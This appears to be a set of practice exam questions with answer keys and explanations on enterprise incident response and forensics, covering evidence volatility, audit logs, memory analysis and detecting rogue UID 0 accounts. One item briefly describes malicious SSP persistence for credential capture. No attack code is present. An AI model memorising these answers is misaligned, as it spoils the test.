The SYSTEM registry hive contains the Services subkey under CurrentControlSet, which stores service configuration including the ImagePath, Start type, and ObjectName. This is the authoritative source for service persistence. Examining it directly reveals malicious services even if the Service Control Manager database is cleared or the service is set to disabled, making it the first artifact to check.

Why this answer

The SYSTEM registry hive stores all service configurations under CurrentControlSet\Services, including the binary path, start type, and account. This makes it the definitive artifact for identifying malicious service persistence. Other artifacts like the Run key, $MFT, or event logs may provide context but do not contain the full service configuration needed for triage.

Exam trap

The trap here is assuming that the Run key or event logs provide service configuration details, when only the SYSTEM hive's Services key contains the authoritative ImagePath and Start values.

31
MCQhard

A large enterprise is responding to a ransomware incident. The adversary has deployed malware that encrypts files and deletes volume shadow copies. The incident response team needs to determine the initial infection vector and the scope of the compromise. They have collected logs from various sources. Which of the following log sources is MOST likely to contain evidence of the initial infection vector if the adversary used a phishing email with a malicious attachment?

A.Windows Security event logs on the domain controller
B.Sysmon logs on user workstations
C.Firewall logs
D.Email gateway logs
AnswerD

Email gateway logs record all inbound and outbound email messages, including sender, recipient, subject, and attachment details. If the adversary used a phishing email with a malicious attachment, the gateway logs would show the delivery of that email, possibly with attachment names and hashes. This is the most direct evidence of the initial infection vector, allowing responders to trace the email back to the sender and identify other recipients.

Why this answer

Email gateway logs are specifically designed to record email metadata and content, including attachments. In a phishing incident, these logs provide the earliest evidence of the attack, showing the malicious email's delivery, sender, and attachment details. This allows responders to identify the initial vector, block similar emails, and notify other potential victims.

Other log sources may show subsequent activity but lack the email context.

Exam trap

The trap here is focusing on endpoint logs that show execution, while overlooking the email gateway logs that directly record the phishing email and its attachment.

32
MCQmedium

An enterprise incident response team is handling a breach where the adversary used valid credentials to access a cloud-hosted email service and created a mailbox forwarding rule to exfiltrate messages. The team has identified the compromised account and wants to determine the full scope of mailbox access and rule creation across the tenant. Which single action should the responder take to obtain the authoritative audit record of these activities?

A.Run a message trace in the Exchange admin center for the past 30 days
B.Inspect the Azure AD sign-in logs for the compromised account
C.Export the Unified Audit Log from the Microsoft 365 compliance center and filter for mailbox rule and access events
D.Review the mailbox owner's Outlook client logs on their workstation
AnswerC

The Unified Audit Log in the Microsoft 365 compliance center records mailbox access, rule creation, and other tenant activities across services. Exporting and filtering it for events such as New-InboxRule and MailItemsAccessed provides the authoritative, tenant-wide record needed to determine the full scope of the adversary's mailbox actions.

Why this answer

The Unified Audit Log is the authoritative tenant-wide record for mailbox access and rule creation in Microsoft 365. It captures events like New-InboxRule and MailItemsAccessed, allowing the responder to determine the full scope of adversary activity. Message trace, client logs, and Azure AD sign-in logs provide complementary but incomplete views and do not record the mailbox-level actions needed.

Exam trap

The trap here is assuming that message trace or Azure AD sign-in logs contain mailbox rule creation and access details, when those events are only recorded in the Unified Audit Log.

33
MCQmedium

During an enterprise incident response, you are examining evidence on a Windows Server 2019 system that may contain a fileless malware infection. You need to determine whether a specific process was injected with malicious code. Which Windows forensic artifact is most directly useful for identifying anomalous memory regions in a process, such as those created by reflective DLL injection?

A.MFT (Master File Table) entries
B.Memory dump of the process
C.Prefetch files
D.Windows Event Log Security log
AnswerB

A memory dump captures the full contents of a process's virtual address space, including loaded modules, heaps, stacks, and any injected code. By analyzing the dump with tools like Volatility or WinDbg, you can identify memory regions that are not backed by a file on disk (e.g., PAGE_EXECUTE_READWRITE) and detect reflective DLL injection. This directly addresses the need to find anomalous memory regions.

Why this answer

Reflective DLL injection loads a DLL directly into memory without writing it to disk, so disk-based artifacts like Prefetch or MFT entries will not show the injected code. A process memory dump captures the actual memory contents, allowing the analyst to spot anomalous regions such as executable memory not backed by a file. This makes the memory dump the most direct and reliable artifact for this scenario.

Exam trap

The trap here is assuming that disk-based execution artifacts like Prefetch or MFT entries can reveal in-memory code injection.

34
MCQeasy

An organization's incident response plan includes a requirement to maintain chain of custody for all digital evidence. A security analyst collects a USB drive from a compromised workstation. Which of the following is the MOST critical action to perform to ensure the evidence is admissible in a court of law?

A.Document the collection details, including date, time, location, and collector's name.
B.Store the USB drive in a secure, locked cabinet with limited access.
C.Create a forensic image of the USB drive using a write-blocker.
D.Analyze the USB drive immediately to identify the attacker.
AnswerA

Chain of custody documentation is essential for admissibility. It records the who, what, when, where, and why of evidence collection and transfer. Without proper documentation, the evidence can be challenged as tampered or unauthenticated. This is the most critical step to maintain integrity and admissibility.

Why this answer

Chain of custody is a legal concept that documents the seizure, custody, control, transfer, analysis, and disposition of evidence. Proper documentation from the moment of collection is crucial to prove that the evidence has not been tampered with. This documentation includes details such as date, time, location, collector, and any transfers.

Without it, the evidence may be deemed inadmissible.

Exam trap

The trap here is focusing on technical preservation steps like imaging or secure storage, but the legal requirement for admissibility hinges on documented chain of custody.

35
MCQeasy

An incident responder is preparing to acquire a forensic image of a running Windows server that is suspected of being compromised. The server hosts a critical database that cannot be taken offline. Which method is most appropriate for acquiring the disk image while minimizing disruption?

A.Use a hardware write blocker and remove the disk to image it on a separate workstation.
B.Use a live acquisition tool like FTK Imager or Magnet ACQUIRE to create a forensic image of the disk while the system is running.
C.Run the built-in Windows backup utility to create a system image to a network share.
D.Use diskpart to create a shadow copy and then copy the volume to an external drive.
AnswerB

Live acquisition tools such as FTK Imager or Magnet ACQUIRE can create a forensic image of the disk without taking the server offline. They capture the disk contents while the system is running, minimizing disruption. This is the most appropriate method for a critical server that cannot be shut down, though it may not capture volatile data, so that should be collected separately.

Why this answer

For a running server that cannot be taken offline, live acquisition with a tool like FTK Imager or Magnet ACQUIRE is the best option. These tools create a forensic image of the disk while the system is operational, preserving the data with minimal disruption. However, they should be used in conjunction with volatile data collection to capture memory and network state.

Exam trap

The trap here is assuming that any backup or shadow copy method is forensically sound, when only specialized live acquisition tools preserve the necessary integrity and completeness.

36
Multi-Selectmedium

During an enterprise incident response involving a compromised Windows server, you need to acquire volatile evidence in a forensically sound manner. Which TWO of the following actions should be performed first to preserve the most volatile data? (Choose two.)

Select 2 answers
A.Capture the contents of physical memory (RAM) using a tool like WinPmem or DumpIt.
B.Export the Windows Event Logs to a secure location.
C.Take screenshots of the desktop and open applications.
D.Create a forensic image of the system drive using FTK Imager or dd.
E.Record active network connections and listening ports using netstat -anob.
AnswersA, E

Physical memory is the most volatile evidence and contains running processes, network connections, and encryption keys. Capturing it first preserves data that would be lost on shutdown or reboot. Tools like WinPmem or DumpIt create a forensic image of RAM that can later be analyzed for artifacts not found on disk, making this a critical first step in volatile evidence collection.

Why this answer

The order of volatility dictates that physical memory and active network connections are the most perishable. Capturing RAM preserves running processes and encryption keys, while recording network connections captures transient command-and-control activity. These two actions must be performed first to prevent loss of critical evidence before moving to less volatile sources like disk images or event logs.

Exam trap

The trap here is assuming that disk imaging or event log export should be done first because they are commonly emphasized, but they are less volatile than RAM and network state.

37
MCQeasy

During an incident response engagement, you need to establish a timeline of adversary activity on a compromised Windows server. Which data source is most appropriate for correlating user logon events, service installations, and process executions?

A.Windows Event Logs
B.Registry hives
C.Prefetch files
D.File system metadata (MAC times)
AnswerA

Windows Event Logs, particularly Security, System, and Application logs, record logon events, service installations, and process creation (with appropriate auditing). They provide timestamps and details necessary for building a comprehensive timeline of adversary activity across multiple event types.

Why this answer

Windows Event Logs are the most comprehensive source for correlating diverse activities such as logons, service installations, and process executions. They provide a centralized, timestamped record that can be analyzed to reconstruct a timeline of adversary actions across the system, making them indispensable for incident response.

Exam trap

The trap here is assuming that file system metadata orPrefetch alone can provide a complete timeline, when they only cover specific types of activity.

38
Multi-Selectmedium

An enterprise incident response team is preparing to contain a confirmed ransomware outbreak that has already encrypted several file servers. The team must preserve forensic evidence while stopping further spread. Which two actions best balance evidence preservation with containment in this scenario? (Choose two.)

Select 2 answers
A.Reimage all affected servers immediately to restore business operations
B.Isolate affected servers from the network at the switch or EDR level while keeping them powered on
C.Immediately power off all affected servers to halt encryption activity
D.Capture a memory image of each affected server before any containment action
E.Delete all encrypted files to prevent the ransomware from spreading further
AnswersB, D

Network isolation via switch ACLs or EDR containment stops lateral spread and command-and-control communication while preserving volatile memory, running processes, and active sessions for forensic capture. It maintains system state for memory acquisition and allows the team to collect live evidence before any shutdown, satisfying both containment and preservation goals.

Why this answer

Isolating affected servers at the network layer stops the spread without destroying volatile evidence, and capturing memory before containment preserves fragile artifacts such as encryption keys and active processes. Together they satisfy containment and preservation. Powering off, reimaging, or deleting files would destroy evidence or recovery options and do not represent a balanced response.

Exam trap

The trap here is equating containment with immediate shutdown or reimaging, when those actions destroy the volatile evidence that ransomware investigations depend on.

39
MCQeasy

An incident responder is reviewing logs from a compromised Linux server and notices a large number of failed SSH login attempts from a single external IP address, followed by a successful login. Which of the following best describes this activity?

A.A misconfigured SSH client repeatedly attempting to authenticate with an expired key.
B.A denial-of-service attack that overwhelmed the SSH service.
C.A brute-force attack that resulted in unauthorized access.
D.A legitimate user who forgot their password and eventually guessed it correctly.
AnswerC

The pattern of many failed SSH logins followed by a successful one is characteristic of a brute-force attack. The attacker likely used a tool like Hydra or Medusa to guess credentials. The successful login indicates that the attacker gained access, which is a critical security incident. The responder should investigate the source IP, check for additional compromised accounts, and review what the attacker did after logging in.

Why this answer

The sequence of numerous failed SSH logins from a single external IP followed by a successful login is a classic indicator of a brute-force attack that succeeded. This constitutes unauthorized access and requires immediate incident response actions, including isolating the server, investigating the attacker's activities, and resetting compromised credentials.

Exam trap

The trap here is dismissing the failed logins as a misconfiguration or a forgetful user, when the external source and eventual success indicate a brute-force attack.

40
MCQhard

An incident responder is analyzing a compromised Windows 10 workstation in an enterprise environment. The adversary used a known malware family that injects code into a legitimate process and then clears the associated event log entries to hinder detection. The responder has a memory image captured from the live system and a disk image acquired afterward. Which artifact in the memory image is most likely to reveal the injected code region and its originating module, even if the on-disk executable was deleted?

A.The Security event log records in the memory image
B.The Windows Prefetch file for the injected process
C.The process's virtual address descriptor (VAD) tree and associated memory sections
D.The MFT record for the deleted executable
AnswerC

The VAD tree describes each memory region mapped into the process, including private committed pages and mapped image sections. Injected code often appears as a private, executable region not backed by a file on disk. Analyzing VAD nodes and their page protections reveals suspicious executable regions and can identify the originating module even if the file was deleted.

Why this answer

The VAD tree is the memory structure that tracks every mapped region in a process, including private executable pages typical of code injection. Because injected code is often not backed by a file on disk, the VAD metadata is the most direct way to identify the anomalous region. Other artifacts like MFT records, Prefetch, or event logs may provide context but do not contain the injected code or its originating module.

Exam trap

The trap here is assuming that deleted-file artifacts such as MFT records or Prefetch files can reveal injected code, when injection lives in memory and is best exposed through the process VAD tree.

41
MCQeasy

An incident responder is analyzing a Linux server that was compromised. The attacker gained initial access via SSH and then created a new user account named 'support' with UID 0. Which command should the responder use to quickly identify all accounts with UID 0 on the system?

A.netstat -tulpn
B.cat /etc/passwd | grep ':0:'
C.ps aux | grep root
D.ls -la /home
AnswerB

The /etc/passwd file contains user account information, with fields separated by colons. The third field is the UID. Searching for ':0:' will match any line where the UID is 0, which is typically only root. This command quickly reveals any additional accounts with root privileges, such as the malicious 'support' account. It is a simple and effective way to detect unauthorized UID 0 accounts.

Why this answer

The /etc/passwd file stores user account details, including the UID in the third field. Searching for ':0:' isolates accounts with UID 0, which have root privileges. This quickly uncovers any unauthorized root-equivalent accounts created by an attacker.

Other commands like ls, ps, or netstat do not provide UID information and would not detect the malicious account.

Exam trap

The trap here is assuming that only the 'root' account can have UID 0, when in fact any account can be assigned UID 0.

42
MCQmedium

During a post-incident review, a team realizes they missed a critical indicator of compromise (IOC) because they did not normalize their log data. What is the primary benefit of log normalization in an enterprise incident response environment?

A.It removes sensitive PII from logs to ensure regulatory compliance.
B.It compresses log files, reducing storage costs for long-term retention.
C.It enables cross-platform correlation by providing a consistent event schema.
D.It automatically blocks malicious traffic detected within the log streams.
AnswerC

Normalization maps diverse log formats into a common format, allowing analysts to perform queries that span across different security devices. This consistency is critical for identifying lateral movement or multi-stage attacks where an actor touches multiple systems, ensuring that disparate events can be linked accurately during an incident investigation.

Why this answer

Log normalization transforms heterogeneous data from various vendors, formats, and sources into a standardized schema. This allows security tools to correlate events across the environment, such as matching a Windows Security log event to a Cisco firewall connection. Without normalization, analysts spend significant time manually parsing logs, which delays detection and increases the likelihood of missing subtle, multi-stage attack patterns that occur across disparate systems during an enterprise-wide security breach.

Exam trap

Candidates often think log normalization is about 'data compression' or 'storage optimization'. They miss the core security value, which is the ability to correlate disparate events into a single, cohesive attack timeline.

43
MCQmedium

Which technique is commonly used by attackers to maintain persistence on a Windows system that specifically targets the login process?

A.Adding a shortcut to the Startup folder.
B.Modifying the Windows registry Run keys.
C.Loading a malicious Security Support Provider (SSP).
D.Installing a malicious browser extension.
AnswerC

Loading a custom SSP via the registry allows the malicious DLL to be loaded into the LSASS process at boot. This provides the attacker with persistence that is integrated into the Windows authentication flow, allowing them to hook system functions and monitor credentials as they are entered by users.

Why this answer

The 'Authentication Packages' or 'SSP' (Security Support Provider) mechanism is a common target for persistence. By loading a malicious DLL as an SSP, the attacker ensures that their code is loaded into the Local Security Authority Subsystem Service (LSASS) process every time the system boots. This grants the attacker deep-level persistence and the ability to capture credentials as they are processed, making it a highly effective and stealthy technique for maintaining long-term access.

Exam trap

Candidates often confuse persistence with privilege escalation. While SSPs facilitate both, their specific role in the authentication chain makes them a primary target for stealthy, boot-time persistence.

44
MCQeasy

An organization is responding to a ransomware incident. The attackers encrypted files on several servers and left a ransom note. Which immediate action should the incident response team take to preserve the most volatile evidence before shutting down the affected systems?

A.Interview system administrators about the ransomware note.
B.Collect volatile data such as memory and network connections.
C.Disconnect the servers from the network to prevent further spread.
D.Capture a forensic image of the disk drives.
AnswerB

Volatile data like memory contents, network connections, and running processes can be lost when a system is powered off. In a ransomware incident, memory may contain encryption keys, command-and-control connections, and other actionable intelligence. Collecting this data first follows the order of volatility and ensures critical evidence is preserved before any shutdown or disk imaging.

Why this answer

The order of volatility dictates that the most volatile evidence, such as memory and network connections, should be collected first. In a ransomware incident, memory can contain encryption keys and indicators of compromise that are crucial for response and recovery. Disk imaging and containment actions can be performed afterward without losing this critical data.

Interviews are non-technical and can be done at any time.

Exam trap

The trap here is prioritizing containment or disk imaging over volatile data collection, which can result in the permanent loss of memory-resident evidence like encryption keys.

Ready to test yourself?

Try a timed practice session using only Enterprise Environment Incident Response questions.